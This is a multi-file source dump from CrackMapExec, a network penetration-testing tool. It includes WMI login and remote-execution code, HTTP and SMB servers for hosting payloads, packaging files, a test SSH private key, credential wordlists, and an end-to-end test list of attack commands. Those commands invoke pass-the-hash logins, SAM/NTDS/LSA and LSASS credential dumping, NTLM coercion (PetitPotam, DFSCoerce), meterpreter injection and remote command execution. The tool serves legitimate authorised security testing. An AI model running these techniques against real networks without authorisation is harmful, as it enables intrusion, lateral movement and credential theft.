self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)
else:
try:
iWbemLevel1Login = IWbemLevel1Login(iInterface)
iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
except Exception as e:
dcom.disconnect()
if not str(e).find("access_denied") > 0:
self.logger.fail(str(e))
else:
dcom.disconnect()
self.logger.extra['protocol'] = "WMI"
self.admin_privs = True
return
def kerberos_login(self, domain, username, password="", ntlm_hash="", aesKey="", kdcHost="", useCache=False):
logging.getLogger("impacket").disabled = True
lmhash = ''
nthash = ''
self.password = password
self.username = username
self.domain = domain
self.remoteName = self.fqdn
self.create_conn_obj()
if password == "":
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.nthash = nthash
self.lmhash = lmhash
if not all("" == s for s in [nthash, password, aesKey]):
kerb_pass = next(s for s in [nthash, password, aesKey] if s)
else:
kerb_pass = ""
if useCache:
if kerb_pass == "":
ccache = CCache.loadFile(os.getenv("KRB5CCNAME"))
username = ccache.credentials[0].header['client'].prettyPrint().decode().split("@")[0]
self.username = username
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
try:
self.conn.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash, aesKey=self.aesKey)
self.conn.set_kerberos(True, kdcHost)
dce = self.conn.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(MSRPC_UUID_PORTMAP)
except Exception as e:
dce.disconnect()
error_msg = str(e).lower()
self.logger.debug(error_msg)
if "unpack requires a buffer of 4 bytes" in error_msg:
error_msg = "Kerberos authentication failure"
out = f"{self.domain}\\{self.username}{used_ccache} {error_msg}"
self.logger.fail(out)
elif "kerberos sessionerror" in str(e).lower():
out = f"{self.domain}\\{self.username}{used_ccache} {list(e.getErrorString())[0]}"
self.logger.fail(out, color="magenta")
return False
else:
out = f"{self.domain}\\{self.username}{used_ccache} {str(e)}"
self.logger.fail(out, color="red")
return False
else:
try:
# Get data from rpc connection if got vaild creds
entry_handle = epm.ept_lookup_handle_t()
request = epm.ept_lookup()
request['inquiry_type'] = 0x0
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = 0x1
request['entry_handle'] = entry_handle
request['max_ents'] = 1
resp = dce.request(request)
except Exception as e:
dce.disconnect()
error_msg = str(e).lower()
self.logger.debug(error_msg)
for code in self.rpc_error_status.keys():
if code in error_msg:
error_msg = self.rpc_error_status[code]
out = f"{self.domain}\\{self.username}{used_ccache} {error_msg.upper()}"
self.logger.fail(out, color=("red" if "access_denied" in error_msg else "magenta"))
return False
else:
self.doKerberos = True
self.check_if_admin()
dce.disconnect()
out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
self.logger.success(out)
return True
def plaintext_login(self, domain, username, password):
self.password = password
self.username = username
self.domain = domain
try:
self.conn.set_credentials(username=self.username, password=self.password, domain=self.domain, lmhash=self.lmhash, nthash=self.nthash)
dce = self.conn.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(MSRPC_UUID_PORTMAP)
except Exception as e:
dce.disconnect()
self.logger.debug(str(e))
out = f"{self.domain}\\{self.username}:{process_secret(self.password)} {str(e)}"
self.logger.fail(out, color="red")
else:
try:
# Get data from rpc connection if got vaild creds
entry_handle = epm.ept_lookup_handle_t()
request = epm.ept_lookup()
request['inquiry_type'] = 0x0
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = 0x1
request['entry_handle'] = entry_handle
request['max_ents'] = 1
resp = dce.request(request)
except Exception as e:
dce.disconnect()
error_msg = str(e).lower()
self.logger.debug(error_msg)
for code in self.rpc_error_status.keys():
if code in error_msg:
error_msg = self.rpc_error_status[code]
self.logger.fail((f"{self.domain}\\{self.username}:{process_secret(self.password)} ({error_msg.upper()})"), color=("red" if "access_denied" in error_msg else "magenta"))
return False
else:
self.check_if_admin()
dce.disconnect()
out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
if self.username == "" and self.password == "":
out += "(Default allow anonymous login)"
self.logger.success(out)
return True
def hash_login(self, domain, username, ntlm_hash):
self.username = username
lmhash = ''
nthash = ''
if ntlm_hash.find(':') != -1:
self.lmhash, self.nthash = ntlm_hash.split(':')
else:
lmhash = ''
nthash = ntlm_hash
self.nthash = nthash
self.lmhash = lmhash
try:
self.conn.set_credentials(username=self.username, password=self.password, domain=self.domain, lmhash=lmhash, nthash=nthash)
dce = self.conn.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.connect()
dce.bind(MSRPC_UUID_PORTMAP)
except Exception as e:
dce.disconnect()
self.logger.debug(str(e))
out = f"{domain}\\{self.username}:{process_secret(self.nthash)} {str(e)}"
self.logger.fail(out, color="red")
else:
try:
# Get data from rpc connection if got vaild creds
entry_handle = epm.ept_lookup_handle_t()
request = epm.ept_lookup()
request['inquiry_type'] = 0x0
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = 0x1
request['entry_handle'] = entry_handle
request['max_ents'] = 1
resp = dce.request(request)
except Exception as e:
dce.disconnect()
error_msg = str(e).lower()
self.logger.debug(error_msg)
for code in self.rpc_error_status.keys():
if code in error_msg:
error_msg = self.rpc_error_status[code]
self.logger.fail((f"{self.domain}\\{self.username}:{process_secret(self.nthash)} ({error_msg.upper()})"), color=("red" if "access_denied" in error_msg else "magenta"))
return False
else:
self.check_if_admin()
dce.disconnect()
out = f"{domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}"
if self.username == "" and self.password == "":
out += "(Default allow anonymous login)"
self.logger.success(out)
return True
# It's very complex to use wmi from rpctansport "convert" to dcom, so let we use dcom directly.
@requires_admin
def wmi(self, WQL=None, namespace=None):
results_WQL = "\r"
records = []
if not WQL:
WQL = self.args.wmi.strip('\n')
if not namespace:
namespace = self.args.wmi_namespace
try:
dcom = DCOMConnection(self.conn.getRemoteName(), self.username, self.password, self.domain, self.lmhash, self.nthash, oxidResolver=True, doKerberos=self.doKerberos ,kdcHost=self.kdcHost, aesKey=self.aesKey)
iInterface = dcom.CoCreateInstanceEx(CLSID_WbemLevel1Login,IID_IWbemLevel1Login)
iWbemLevel1Login = IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin(namespace , NULL, NULL)
iWbemLevel1Login.RemRelease()
iEnumWbemClassObject = iWbemServices.ExecQuery(WQL)
except Exception as e:
dcom.disconnect()
self.logger.debug(str(e))
self.logger.fail('Execute WQL error: {}'.format(str(e)))
return False
else:
self.logger.info(f"Executing WQL syntax: {WQL}")
while True:
try:
wmi_results = iEnumWbemClassObject.Next(0xffffffff, 1)[0]
record = wmi_results.getProperties()
records.append(record)
for k,v in record.items():
self.logger.highlight(f"{k} => {v['value']}")
except Exception as e:
if str(e).find('S_FALSE') < 0:
self.logger.debug(str(e))
else:
break
dcom.disconnect()
return records
@requires_admin
def execute(self, command=None, get_output=False):
output = ""
if not command:
command = self.args.execute
if not self.args.no_output:
get_output = True
if "systeminfo" in command and self.args.interval_time < 10:
self.logger.fail("Execute 'systeminfo' must set the interval time higher than 10 seconds")
return False
if self.server_os is not None and "NT 5" in self.server_os:
self.logger.fail("Execute command failed, not support current server os (version < NT 6)")
return False
if self.args.exec_method == "wmiexec":
exec_method = wmiexec.WMIEXEC(self.conn.getRemoteName(), self.username, self.password, self.domain, self.lmhash, self.nthash, self.doKerberos, self.kdcHost, self.aesKey, self.logger, self.args.interval_time, self.args.codec)
output = exec_method.execute(command, get_output)
elif self.args.exec_method == "wmiexec-event":
exec_method = wmiexec_event.WMIEXEC_EVENT(self.conn.getRemoteName(), self.username, self.password, self.domain, self.lmhash, self.nthash, self.doKerberos, self.kdcHost, self.aesKey, self.logger, self.args.interval_time, self.args.codec)
output = exec_method.execute(command, get_output)
self.conn.disconnect()
if output == "" and get_output:
self.logger.fail("Execute command failed, probabaly got detection by AV.")
return False
else:
self.logger.success(f'Executed command: "{command}" via {self.args.exec_method}')
buf = StringIO(output).readlines()
for line in buf:
self.logger.highlight(line.strip())
return output
================================================
FILE: cme/servers/__init__.py
================================================
================================================
FILE: cme/servers/http.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import http.server
import threading
import ssl
import os
import sys
from http.server import BaseHTTPRequestHandler
from time import sleep
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
class RequestHandler(BaseHTTPRequestHandler):
def log_message(self, format, *args):
server_logger = CMEAdapter(
extra={
"module_name": self.server.module.name.upper(),
"host": self.client_address[0],
}
)
server_logger.display("- - %s" % (format % args))
def do_GET(self):
if hasattr(self.server.module, "on_request"):
server_logger = CMEAdapter(
extra={
"module_name": self.server.module.name.upper(),
"host": self.client_address[0],
}
)
self.server.context.log = server_logger
self.server.module.on_request(self.server.context, self)
def do_POST(self):
if hasattr(self.server.module, "on_response"):
server_logger = CMEAdapter(
extra={
"module_name": self.server.module.name.upper(),
"host": self.client_address[0],
}
)
self.server.context.log = server_logger
self.server.module.on_response(self.server.context, self)
def stop_tracking_host(self):
"""
This gets called when a module has finshed executing, removes the host from the connection tracker list
"""
try:
self.server.hosts.remove(self.client_address[0])
if hasattr(self.server.module, "on_shutdown"):
self.server.module.on_shutdown(self.server.context, self.server.connection)
except ValueError:
pass
class CMEServer(threading.Thread):
def __init__(self, module, context, logger, srv_host, port, server_type="https"):
try:
threading.Thread.__init__(self)
self.server = http.server.HTTPServer((srv_host, int(port)), RequestHandler)
self.server.hosts = []
self.server.module = module
self.server.context = context
self.server.log = CMEAdapter(extra={"module_name": self.server.module.name.upper()})
self.cert_path = os.path.join(os.path.expanduser("~/.cme"), "cme.pem")
self.server.track_host = self.track_host
logger.debug("CME server type: " + server_type)
if server_type == "https":
self.server.socket = ssl.wrap_socket(self.server.socket, certfile=self.cert_path, server_side=True)
except Exception as e:
errno, message = e.args
if errno == 98 and message == "Address already in use":
logger.error("Error starting HTTP(S) server: the port is already in use, try specifying a diffrent port using --server-port")
else:
logger.error(f"Error starting HTTP(S) server: {message}")
sys.exit(1)
def base_server(self):
return self.server
def track_host(self, host_ip):
self.server.hosts.append(host_ip)
def run(self):
try:
self.server.serve_forever()
except:
pass
def shutdown(self):
try:
while len(self.server.hosts) > 0:
self.server.log.info(f"Waiting on {highlight(len(self.server.hosts))} host(s)")
sleep(15)
except KeyboardInterrupt:
pass
# shut down the server/socket
self.server.shutdown()
self.server.socket.close()
self.server.server_close()
# make sure all the threads are killed
for thread in threading.enumerate():
if thread.is_alive():
try:
thread._stop()
except:
pass
================================================
FILE: cme/servers/smb.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import threading
from threading import enumerate
from sys import exit
from impacket import smbserver
class CMESMBServer(threading.Thread):
def __init__(
self,
logger,
share_name,
share_path="/tmp/cme_hosted",
listen_address="0.0.0.0",
listen_port=445,
verbose=False,
):
try:
threading.Thread.__init__(self)
self.server = smbserver.SimpleSMBServer(listen_address, listen_port)
self.server.addShare(share_name.upper(), share_path)
if verbose:
self.server.setLogFile("")
self.server.setSMB2Support(True)
self.server.setSMBChallenge("")
except Exception as e:
errno, message = e.args
if errno == 98 and message == "Address already in use":
logger.error("Error starting SMB server on port 445: the port is already in use")
else:
logger.error(f"Error starting SMB server on port 445: {message}")
exit(1)
def addShare(self, share_name, share_path):
self.server.addShare(share_name, share_path)
def run(self):
try:
self.server.start()
except:
pass
def shutdown(self):
# TODO: should fine the proper way
# make sure all the threads are killed
for thread in enumerate():
if thread.is_alive():
try:
self._stop()
except:
pass
================================================
FILE: crackmapexec.spec
================================================
# -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['./cme/crackmapexec.py'],
pathex=['./cme'],
binaries=[],
datas=[('./cme/protocols', 'cme/protocols'),('./cme/data', 'cme/data'),('./cme/modules', 'cme/modules')],
hiddenimports=['cme.protocols.mssql.mssqlexec', 'cme.connection', 'impacket.examples.secretsdump', 'impacket.dcerpc.v5.lsat', 'impacket.dcerpc.v5.transport', 'impacket.dcerpc.v5.lsad', 'cme.servers.smb', 'cme.protocols.smb.wmiexec', 'cme.protocols.smb.atexec', 'cme.protocols.smb.smbexec', 'cme.protocols.smb.mmcexec', 'cme.protocols.smb.smbspider', 'cme.protocols.smb.passpol', 'paramiko', 'pypsrp.client', 'pywerview.cli.helpers', 'impacket.tds', 'impacket.version', 'cme.helpers.bash', 'pylnk3', 'lsassy','win32timezone', 'impacket.tds', 'impacket.ldap.ldap', 'impacket.tds'],
hookspath=['./cme/.hooks'],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='crackmapexec',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
upx_exclude=[],
runtime_tmpdir=None,
console=True,
icon='./cme/data/cme.ico' )
================================================
FILE: flake.nix
================================================
{
description = "Application packaged using poetry2nix";
inputs.flake-utils.url = "github:numtide/flake-utils";
inputs.nixpkgs.url = "github:NixOS/nixpkgs";
inputs.poetry2nix.url = "github:nix-community/poetry2nix";
outputs = { self, nixpkgs, flake-utils, poetry2nix }:
{
# Nixpkgs overlay providing the application
overlay = nixpkgs.lib.composeManyExtensions [
poetry2nix.overlay
(final: prev: {
# The application
CrackMapExec = prev.poetry2nix.mkPoetryApplication {
projectDir = ./.;
};
})
];
} // (flake-utils.lib.eachDefaultSystem (system:
let
pkgs = import nixpkgs {
inherit system;
overlays = [ self.overlay ];
};
in
{
apps = {
CrackMapExec = pkgs.CrackMapExec;
};
defaultApp = pkgs.CrackMapExec;
packages = { CrackMapExec = pkgs.CrackMapExec; };
}));
}
================================================
FILE: pyproject.toml
================================================
[tool.poetry]
name = "crackmapexec"
version = "6.1.0"
description = "A swiss army knife for pentesting networks"
authors = ["Marcello Salvati ", "Martial Puygrenier "]
readme = "README.md"
homepage = "https://github.com/mpgn/CrackMapExec"
repository = "https://github.com/mpgn/CrackMapExec"
exclude = []
include = ["cme/data/*", "cme/modules/*"]
license = "BSD-2-Clause"
classifiers = [
'Environment :: Console',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Topic :: Security',
]
packages = [
{ include = "cme"}
]
[tool.poetry.scripts]
cme = 'cme.crackmapexec:main'
crackmapexec = 'cme.crackmapexec:main'
cmedb = 'cme.cmedb:main'
[tool.poetry.dependencies]
python = "^3.7.0"
requests = ">=2.27.1"
beautifulsoup4 = ">=4.11,<5"
lsassy = ">=3.1.8"
termcolor = "^1.1.0"
msgpack = "^1.0.0"
neo4j = "^4.1.1"
pylnk3 = "^0.4.2"
pypsrp = "^0.7.0"
paramiko = "^2.7.2"
impacket = { git = "https://github.com/mpgn/impacket.git", branch = "gkdi" }
dsinternals = "^1.2.4"
xmltodict = "^0.12.0"
terminaltables = "^3.1.0"
aioconsole = "^0.3.3"
pywerview = "^0.3.3"
minikerberos = "^0.4.0"
pypykatz = "^0.6.8"
aardwolf = "^0.2.7"
dploot = "^2.2.1"
bloodhound = "^1.6.1"
asyauth = "~0.0.13"
masky = "^0.2.0"
sqlalchemy = "^2.0.4"
aiosqlite = "^0.18.0"
pyasn1-modules = "^0.3.0"
rich = "^13.3.5"
python-libnmap = "^0.7.3"
resource = "^0.2.1"
oscrypto = { git = "https://github.com/NeffIsBack/oscrypto" }
[tool.poetry.group.dev.dependencies]
flake8 = "*"
pylint = "*"
shiv = "*"
black = "^20.8b1"
pytest = "^7.2.2"
[build-system]
requires = ["poetry-core>=1.2.0"]
build-backend = "poetry.core.masonry.api"
================================================
FILE: shell.nix
================================================
{ pkgs ? import {} }:
let
myAppEnv = pkgs.poetry2nix.mkPoetryEnv {
projectDir = ./.;
editablePackageSources = {
my-app = ./src;
};
};
in myAppEnv.env
================================================
FILE: tests/README.md
================================================
# CME Tests
## Running Tests
### Unit Tests
* Install CME (either in venv or via Poetry)
* Run `pytest` (or `poetry run pytest`)
### End to End Tests
* Install CME (either in venv or via Poetry)
* Run `python tests/e2e_tests.py -t $IP -u $USER -p $PASS`, with optional `-k` parameter
* Poetry: `poetry run python tests/e2e_tests.py -t $IP -u $USER -p $PASS`
* To see full errors (that might show real errors not caught by checking the exit code), run with the `--errors` flag
================================================
FILE: tests/data/test_key.priv
================================================
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
================================================
FILE: tests/data/test_passwords.txt
================================================
Passw0rd!
None
ftp
guest
================================================
FILE: tests/data/test_users.txt
================================================
Administrator
Anonymous
ftp
guest
================================================
FILE: tests/e2e_commands.txt
================================================
##### SMB
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --pass-pol
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --disks
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --groups
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sessions
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --loggedon-users
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --users
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --computers
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --rid-brute
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-groups
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --gen-relay-list /tmp/relaylistOutputFilename.txt
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-auth
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sam
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --ntds
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --lsa
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --dpapi
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -x whoami
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --wmi "select Name from win32_computersystem"
##### SMB Modules
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M bh_owned
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc -o CLEANUP=True
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener OBFUSCATE=True
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_av
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns -o DOMAIN=google.com
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M firefox
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get_netconnections
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_password
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz -o HANDLEKATZ_EXE_NAME="hk.exe"
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M hash_spider
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M impersonate
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M install_elevated
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver
# currently hanging indefinitely - TODO: look into this
#crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_discover
#crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger -o ACTION=ALL USER=USERNAME KEEPASS_CONFIG_PATH="C:\\Users\\USERNAME\\AppData\\Roaming\\KeePass\\KeePass.config.xml"
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M lsassy
# You must replace this with the proper CA information!
#crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M masky -o CA="host.domain.tld\domain-host-CA"
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M msol
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nopac
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntdsutil
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntlmv1
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M petitpotam
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M procdump
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdcman
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion KEY=DevicePath
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M runasppl
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o NAME=test CLEANUP=True
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o SERVER=127.0.0.1 NAME=test
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o NAME=test CLEANUP=True
# spider_plus takes a while to run, so it is commented out during normal testing
# crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spider_plus -o MAX_FILE_SIZE=100
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M teams_localdb
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M uac
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M veeam
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=enable
